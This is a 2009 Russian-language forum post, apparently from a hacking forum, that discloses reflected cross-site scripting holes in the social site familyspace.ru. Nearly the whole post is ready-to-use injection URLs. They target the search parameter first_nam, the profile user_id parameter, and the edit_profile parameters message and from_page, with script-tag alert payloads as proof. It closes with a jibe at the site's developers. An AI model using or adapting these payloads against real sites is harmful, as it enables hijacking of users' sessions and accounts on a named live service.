20.01.2009, 14:56
|
|
Участник форума
Регистрация: 09.03.2008
Сообщений: 193
Провел на форуме:
2140897
Репутация:
267
|
|
Familyspace.ru
XSS в Поиске
Код:
http://www.familyspace.ru/index.php?page=search&pn=1&first_nam=">[XSS]
XSS при просмотре профиля
Код:
http://www.familyspace.ru/index.php?page=profile&user_id=[тут id пользователя][XSS]
Пример
Код:
http://www.familyspace.ru/index.php?page=profile&user_id=75212<script>alert()</script>
А тут сходу 2 XSS уязвимая переменная message и from_page
Код:
http://www.familyspace.ru/index.php?page=edit_profile&message=">[XSS]&from_page=">[XSS]
Пример:
Код:
http://www.familyspace.ru/index.php?page=edit_profile&message="><script>alert(1)</script>&from_page="><script>alert(2)</script>
Наверно разработчики предыдущего проекта поделились травой с этими 
|
|
|